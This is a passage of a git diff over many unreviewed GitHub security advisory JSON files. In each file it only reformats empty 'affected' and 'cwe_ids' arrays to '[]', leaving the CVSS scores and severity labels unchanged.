"CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9hp2-vhc2-jq3p/GHSA-9hp2-vhc2-jq3p.json b/advisories/unreviewed/2022/05/GHSA-9hp2-vhc2-jq3p/GHSA-9hp2-vhc2-jq3p.json index eee8f939f37..392111debba 100644 --- a/advisories/unreviewed/2022/05/GHSA-9hp2-vhc2-jq3p/GHSA-9hp2-vhc2-jq3p.json +++ b/advisories/unreviewed/2022/05/GHSA-9hp2-vhc2-jq3p/GHSA-9hp2-vhc2-jq3p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9m3x-jcp9-v9rq/GHSA-9m3x-jcp9-v9rq.json b/advisories/unreviewed/2022/05/GHSA-9m3x-jcp9-v9rq/GHSA-9m3x-jcp9-v9rq.json index 0cc56768c5c..f30bebf52a2 100644 --- a/advisories/unreviewed/2022/05/GHSA-9m3x-jcp9-v9rq/GHSA-9m3x-jcp9-v9rq.json +++ b/advisories/unreviewed/2022/05/GHSA-9m3x-jcp9-v9rq/GHSA-9m3x-jcp9-v9rq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9p8m-fg8m-h3xv/GHSA-9p8m-fg8m-h3xv.json b/advisories/unreviewed/2022/05/GHSA-9p8m-fg8m-h3xv/GHSA-9p8m-fg8m-h3xv.json index e769f1d4c60..cad436c96b4 100644 --- a/advisories/unreviewed/2022/05/GHSA-9p8m-fg8m-h3xv/GHSA-9p8m-fg8m-h3xv.json +++ b/advisories/unreviewed/2022/05/GHSA-9p8m-fg8m-h3xv/GHSA-9p8m-fg8m-h3xv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9q3q-cp86-93v4/GHSA-9q3q-cp86-93v4.json b/advisories/unreviewed/2022/05/GHSA-9q3q-cp86-93v4/GHSA-9q3q-cp86-93v4.json index aaad7a22a4b..17e9a966ef2 100644 --- a/advisories/unreviewed/2022/05/GHSA-9q3q-cp86-93v4/GHSA-9q3q-cp86-93v4.json +++ b/advisories/unreviewed/2022/05/GHSA-9q3q-cp86-93v4/GHSA-9q3q-cp86-93v4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9q7q-5f3m-g2jf/GHSA-9q7q-5f3m-g2jf.json b/advisories/unreviewed/2022/05/GHSA-9q7q-5f3m-g2jf/GHSA-9q7q-5f3m-g2jf.json index b5988c7337d..a0340c3dcb4 100644 --- a/advisories/unreviewed/2022/05/GHSA-9q7q-5f3m-g2jf/GHSA-9q7q-5f3m-g2jf.json +++ b/advisories/unreviewed/2022/05/GHSA-9q7q-5f3m-g2jf/GHSA-9q7q-5f3m-g2jf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-9qrf-9m98-v5r2/GHSA-9qrf-9m98-v5r2.json b/advisories/unreviewed/2022/05/GHSA-9qrf-9m98-v5r2/GHSA-9qrf-9m98-v5r2.json index c67688b9441..e0d3fde1549 100644 --- a/advisories/unreviewed/2022/05/GHSA-9qrf-9m98-v5r2/GHSA-9qrf-9m98-v5r2.json +++ b/advisories/unreviewed/2022/05/GHSA-9qrf-9m98-v5r2/GHSA-9qrf-9m98-v5r2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-9v74-r9p5-83j9/GHSA-9v74-r9p5-83j9.json b/advisories/unreviewed/2022/05/GHSA-9v74-r9p5-83j9/GHSA-9v74-r9p5-83j9.json index d9f749da912..fb2ea5705bc 100644 --- a/advisories/unreviewed/2022/05/GHSA-9v74-r9p5-83j9/GHSA-9v74-r9p5-83j9.json +++ b/advisories/unreviewed/2022/05/GHSA-9v74-r9p5-83j9/GHSA-9v74-r9p5-83j9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c26g-h6v8-qhf5/GHSA-c26g-h6v8-qhf5.json b/advisories/unreviewed/2022/05/GHSA-c26g-h6v8-qhf5/GHSA-c26g-h6v8-qhf5.json index c4c18d9bdb1..eca5036fdcb 100644 --- a/advisories/unreviewed/2022/05/GHSA-c26g-h6v8-qhf5/GHSA-c26g-h6v8-qhf5.json +++ b/advisories/unreviewed/2022/05/GHSA-c26g-h6v8-qhf5/GHSA-c26g-h6v8-qhf5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c2m8-x86w-rcrj/GHSA-c2m8-x86w-rcrj.json b/advisories/unreviewed/2022/05/GHSA-c2m8-x86w-rcrj/GHSA-c2m8-x86w-rcrj.json index f0a3fa0a35f..162ff3f1760 100644 --- a/advisories/unreviewed/2022/05/GHSA-c2m8-x86w-rcrj/GHSA-c2m8-x86w-rcrj.json +++ b/advisories/unreviewed/2022/05/GHSA-c2m8-x86w-rcrj/GHSA-c2m8-x86w-rcrj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c52j-5mh4-h7mf/GHSA-c52j-5mh4-h7mf.json b/advisories/unreviewed/2022/05/GHSA-c52j-5mh4-h7mf/GHSA-c52j-5mh4-h7mf.json index e0e414f1e84..4b82d7f91d4 100644 --- a/advisories/unreviewed/2022/05/GHSA-c52j-5mh4-h7mf/GHSA-c52j-5mh4-h7mf.json +++ b/advisories/unreviewed/2022/05/GHSA-c52j-5mh4-h7mf/GHSA-c52j-5mh4-h7mf.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c5vx-c657-hmcm/GHSA-c5vx-c657-hmcm.json b/advisories/unreviewed/2022/05/GHSA-c5vx-c657-hmcm/GHSA-c5vx-c657-hmcm.json index a6ac15d50f8..d1eb32b1360 100644 --- a/advisories/unreviewed/2022/05/GHSA-c5vx-c657-hmcm/GHSA-c5vx-c657-hmcm.json +++ b/advisories/unreviewed/2022/05/GHSA-c5vx-c657-hmcm/GHSA-c5vx-c657-hmcm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c64p-77m6-v4m5/GHSA-c64p-77m6-v4m5.json b/advisories/unreviewed/2022/05/GHSA-c64p-77m6-v4m5/GHSA-c64p-77m6-v4m5.json index 3cbdb347458..b43895bf751 100644 --- a/advisories/unreviewed/2022/05/GHSA-c64p-77m6-v4m5/GHSA-c64p-77m6-v4m5.json +++ b/advisories/unreviewed/2022/05/GHSA-c64p-77m6-v4m5/GHSA-c64p-77m6-v4m5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c6p3-wp6g-rpp8/GHSA-c6p3-wp6g-rpp8.json b/advisories/unreviewed/2022/05/GHSA-c6p3-wp6g-rpp8/GHSA-c6p3-wp6g-rpp8.json index fe394471715..c42f188b0a3 100644 --- a/advisories/unreviewed/2022/05/GHSA-c6p3-wp6g-rpp8/GHSA-c6p3-wp6g-rpp8.json +++ b/advisories/unreviewed/2022/05/GHSA-c6p3-wp6g-rpp8/GHSA-c6p3-wp6g-rpp8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-c7hf-q589-mh9r/GHSA-c7hf-q589-mh9r.json b/advisories/unreviewed/2022/05/GHSA-c7hf-q589-mh9r/GHSA-c7hf-q589-mh9r.json index 838f2a51b32..08bf8cd3ec4 100644 --- a/advisories/unreviewed/2022/05/GHSA-c7hf-q589-mh9r/GHSA-c7hf-q589-mh9r.json +++ b/advisories/unreviewed/2022/05/GHSA-c7hf-q589-mh9r/GHSA-c7hf-q589-mh9r.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c8mc-x79x-5cgq/GHSA-c8mc-x79x-5cgq.json b/advisories/unreviewed/2022/05/GHSA-c8mc-x79x-5cgq/GHSA-c8mc-x79x-5cgq.json index b9e6c025373..b3cfe21fbd4 100644 --- a/advisories/unreviewed/2022/05/GHSA-c8mc-x79x-5cgq/GHSA-c8mc-x79x-5cgq.json +++ b/advisories/unreviewed/2022/05/GHSA-c8mc-x79x-5cgq/GHSA-c8mc-x79x-5cgq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c9rh-2cwq-fxj4/GHSA-c9rh-2cwq-fxj4.json b/advisories/unreviewed/2022/05/GHSA-c9rh-2cwq-fxj4/GHSA-c9rh-2cwq-fxj4.json index 7e59a3d6233..df65a2af796 100644 --- a/advisories/unreviewed/2022/05/GHSA-c9rh-2cwq-fxj4/GHSA-c9rh-2cwq-fxj4.json +++ b/advisories/unreviewed/2022/05/GHSA-c9rh-2cwq-fxj4/GHSA-c9rh-2cwq-fxj4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:L" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c9v7-mw74-6c7c/GHSA-c9v7-mw74-6c7c.json b/advisories/unreviewed/2022/05/GHSA-c9v7-mw74-6c7c/GHSA-c9v7-mw74-6c7c.json index 8d525b70c4f..24d1f2d1db6 100644 --- a/advisories/unreviewed/2022/05/GHSA-c9v7-mw74-6c7c/GHSA-c9v7-mw74-6c7c.json +++ b/advisories/unreviewed/2022/05/GHSA-c9v7-mw74-6c7c/GHSA-c9v7-mw74-6c7c.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cf7j-643v-cwwc/GHSA-cf7j-643v-cwwc.json b/advisories/unreviewed/2022/05/GHSA-cf7j-643v-cwwc/GHSA-cf7j-643v-cwwc.json index eb4e0dab147..4704a425611 100644 --- a/advisories/unreviewed/2022/05/GHSA-cf7j-643v-cwwc/GHSA-cf7j-643v-cwwc.json +++ b/advisories/unreviewed/2022/05/GHSA-cf7j-643v-cwwc/GHSA-cf7j-643v-cwwc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cfvf-jc9j-vf5v/GHSA-cfvf-jc9j-vf5v.json b/advisories/unreviewed/2022/05/GHSA-cfvf-jc9j-vf5v/GHSA-cfvf-jc9j-vf5v.json index 2c813f9a5ce..2785b36a0af 100644 --- a/advisories/unreviewed/2022/05/GHSA-cfvf-jc9j-vf5v/GHSA-cfvf-jc9j-vf5v.json +++ b/advisories/unreviewed/2022/05/GHSA-cfvf-jc9j-vf5v/GHSA-cfvf-jc9j-vf5v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-chm7-2j5c-mgr5/GHSA-chm7-2j5c-mgr5.json b/advisories/unreviewed/2022/05/GHSA-chm7-2j5c-mgr5/GHSA-chm7-2j5c-mgr5.json index 7c2fb8b4f2a..097d47e7e38 100644 --- a/advisories/unreviewed/2022/05/GHSA-chm7-2j5c-mgr5/GHSA-chm7-2j5c-mgr5.json +++ b/advisories/unreviewed/2022/05/GHSA-chm7-2j5c-mgr5/GHSA-chm7-2j5c-mgr5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cmrj-247h-f4v8/GHSA-cmrj-247h-f4v8.json b/advisories/unreviewed/2022/05/GHSA-cmrj-247h-f4v8/GHSA-cmrj-247h-f4v8.json index 1314fca4c9d..4748724dc41 100644 --- a/advisories/unreviewed/2022/05/GHSA-cmrj-247h-f4v8/GHSA-cmrj-247h-f4v8.json +++ b/advisories/unreviewed/2022/05/GHSA-cmrj-247h-f4v8/GHSA-cmrj-247h-f4v8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cpgg-vc4m-4j8x/GHSA-cpgg-vc4m-4j8x.json b/advisories/unreviewed/2022/05/GHSA-cpgg-vc4m-4j8x/GHSA-cpgg-vc4m-4j8x.json index 21213afa4fc..154f219dc50 100644 --- a/advisories/unreviewed/2022/05/GHSA-cpgg-vc4m-4j8x/GHSA-cpgg-vc4m-4j8x.json +++ b/advisories/unreviewed/2022/05/GHSA-cpgg-vc4m-4j8x/GHSA-cpgg-vc4m-4j8x.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cpqg-cv2f-q5p4/GHSA-cpqg-cv2f-q5p4.json b/advisories/unreviewed/2022/05/GHSA-cpqg-cv2f-q5p4/GHSA-cpqg-cv2f-q5p4.json index d770e53c5fa..d943df73795 100644 --- a/advisories/unreviewed/2022/05/GHSA-cpqg-cv2f-q5p4/GHSA-cpqg-cv2f-q5p4.json +++ b/advisories/unreviewed/2022/05/GHSA-cpqg-cv2f-q5p4/GHSA-cpqg-cv2f-q5p4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cq93-wfj8-r995/GHSA-cq93-wfj8-r995.json b/advisories/unreviewed/2022/05/GHSA-cq93-wfj8-r995/GHSA-cq93-wfj8-r995.json index 85337895d0b..2ff9004350f 100644 --- a/advisories/unreviewed/2022/05/GHSA-cq93-wfj8-r995/GHSA-cq93-wfj8-r995.json +++ b/advisories/unreviewed/2022/05/GHSA-cq93-wfj8-r995/GHSA-cq93-wfj8-r995.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cv35-357j-grvj/GHSA-cv35-357j-grvj.json b/advisories/unreviewed/2022/05/GHSA-cv35-357j-grvj/GHSA-cv35-357j-grvj.json index 7224bdb0aca..fa85f2baa6e 100644 --- a/advisories/unreviewed/2022/05/GHSA-cv35-357j-grvj/GHSA-cv35-357j-grvj.json +++ b/advisories/unreviewed/2022/05/GHSA-cv35-357j-grvj/GHSA-cv35-357j-grvj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cw4p-9wfm-98vg/GHSA-cw4p-9wfm-98vg.json b/advisories/unreviewed/2022/05/GHSA-cw4p-9wfm-98vg/GHSA-cw4p-9wfm-98vg.json index 1e294d2501f..cc8cc6e6f61 100644 --- a/advisories/unreviewed/2022/05/GHSA-cw4p-9wfm-98vg/GHSA-cw4p-9wfm-98vg.json +++ b/advisories/unreviewed/2022/05/GHSA-cw4p-9wfm-98vg/GHSA-cw4p-9wfm-98vg.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-cwxf-8xj2-c65q/GHSA-cwxf-8xj2-c65q.json b/advisories/unreviewed/2022/05/GHSA-cwxf-8xj2-c65q/GHSA-cwxf-8xj2-c65q.json index d15508553c1..1e663ab34cf 100644 --- a/advisories/unreviewed/2022/05/GHSA-cwxf-8xj2-c65q/GHSA-cwxf-8xj2-c65q.json +++ b/advisories/unreviewed/2022/05/GHSA-cwxf-8xj2-c65q/GHSA-cwxf-8xj2-c65q.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cx2r-fxw7-w76f/GHSA-cx2r-fxw7-w76f.json b/advisories/unreviewed/2022/05/GHSA-cx2r-fxw7-w76f/GHSA-cx2r-fxw7-w76f.json index ec0994999d8..cdcb3114328 100644 --- a/advisories/unreviewed/2022/05/GHSA-cx2r-fxw7-w76f/GHSA-cx2r-fxw7-w76f.json +++ b/advisories/unreviewed/2022/05/GHSA-cx2r-fxw7-w76f/GHSA-cx2r-fxw7-w76f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-cxpf-rmp3-qfqr/GHSA-cxpf-rmp3-qfqr.json b/advisories/unreviewed/2022/05/GHSA-cxpf-rmp3-qfqr/GHSA-cxpf-rmp3-qfqr.json index a72ce02ba70..adff714577d 100644 --- a/advisories/unreviewed/2022/05/GHSA-cxpf-rmp3-qfqr/GHSA-cxpf-rmp3-qfqr.json +++ b/advisories/unreviewed/2022/05/GHSA-cxpf-rmp3-qfqr/GHSA-cxpf-rmp3-qfqr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -47,9 +45,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f2fh-3v8x-pp92/GHSA-f2fh-3v8x-pp92.json b/advisories/unreviewed/2022/05/GHSA-f2fh-3v8x-pp92/GHSA-f2fh-3v8x-pp92.json index 58139b3690e..aa880ea59be 100644 --- a/advisories/unreviewed/2022/05/GHSA-f2fh-3v8x-pp92/GHSA-f2fh-3v8x-pp92.json +++ b/advisories/unreviewed/2022/05/GHSA-f2fh-3v8x-pp92/GHSA-f2fh-3v8x-pp92.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f2v8-h69h-xg4j/GHSA-f2v8-h69h-xg4j.json b/advisories/unreviewed/2022/05/GHSA-f2v8-h69h-xg4j/GHSA-f2v8-h69h-xg4j.json index b2d76ba5b4f..c4a870c87f6 100644 --- a/advisories/unreviewed/2022/05/GHSA-f2v8-h69h-xg4j/GHSA-f2v8-h69h-xg4j.json +++ b/advisories/unreviewed/2022/05/GHSA-f2v8-h69h-xg4j/GHSA-f2v8-h69h-xg4j.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-f3j2-qmmf-mrrq/GHSA-f3j2-qmmf-mrrq.json b/advisories/unreviewed/2022/05/GHSA-f3j2-qmmf-mrrq/GHSA-f3j2-qmmf-mrrq.json index 8fbf691590c..6b64c5b4a1c 100644 --- a/advisories/unreviewed/2022/05/GHSA-f3j2-qmmf-mrrq/GHSA-f3j2-qmmf-mrrq.json +++ b/advisories/unreviewed/2022/05/GHSA-f3j2-qmmf-mrrq/GHSA-f3j2-qmmf-mrrq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f494-3xww-3vw5/GHSA-f494-3xww-3vw5.json b/advisories/unreviewed/2022/05/GHSA-f494-3xww-3vw5/GHSA-f494-3xww-3vw5.json index eee62b11eb1..35093dd72b5 100644 --- a/advisories/unreviewed/2022/05/GHSA-f494-3xww-3vw5/GHSA-f494-3xww-3vw5.json +++ b/advisories/unreviewed/2022/05/GHSA-f494-3xww-3vw5/GHSA-f494-3xww-3vw5.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f53h-49xr-7j8w/GHSA-f53h-49xr-7j8w.json b/advisories/unreviewed/2022/05/GHSA-f53h-49xr-7j8w/GHSA-f53h-49xr-7j8w.json index b387c44288c..3eea690faff 100644 --- a/advisories/unreviewed/2022/05/GHSA-f53h-49xr-7j8w/GHSA-f53h-49xr-7j8w.json +++ b/advisories/unreviewed/2022/05/GHSA-f53h-49xr-7j8w/GHSA-f53h-49xr-7j8w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f554-chqx-mw97/GHSA-f554-chqx-mw97.json b/advisories/unreviewed/2022/05/GHSA-f554-chqx-mw97/GHSA-f554-chqx-mw97.json index 8cd90a2c122..bb492cc12ef 100644 --- a/advisories/unreviewed/2022/05/GHSA-f554-chqx-mw97/GHSA-f554-chqx-mw97.json +++ b/advisories/unreviewed/2022/05/GHSA-f554-chqx-mw97/GHSA-f554-chqx-mw97.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-f576-6hpp-xg96/GHSA-f576-6hpp-xg96.json b/advisories/unreviewed/2022/05/GHSA-f576-6hpp-xg96/GHSA-f576-6hpp-xg96.json index 3d526554d97..6ae26263fcf 100644 --- a/advisories/unreviewed/2022/05/GHSA-f576-6hpp-xg96/GHSA-f576-6hpp-xg96.json +++ b/advisories/unreviewed/2022/05/GHSA-f576-6hpp-xg96/GHSA-f576-6hpp-xg96.json @@ -13,9 +13,7 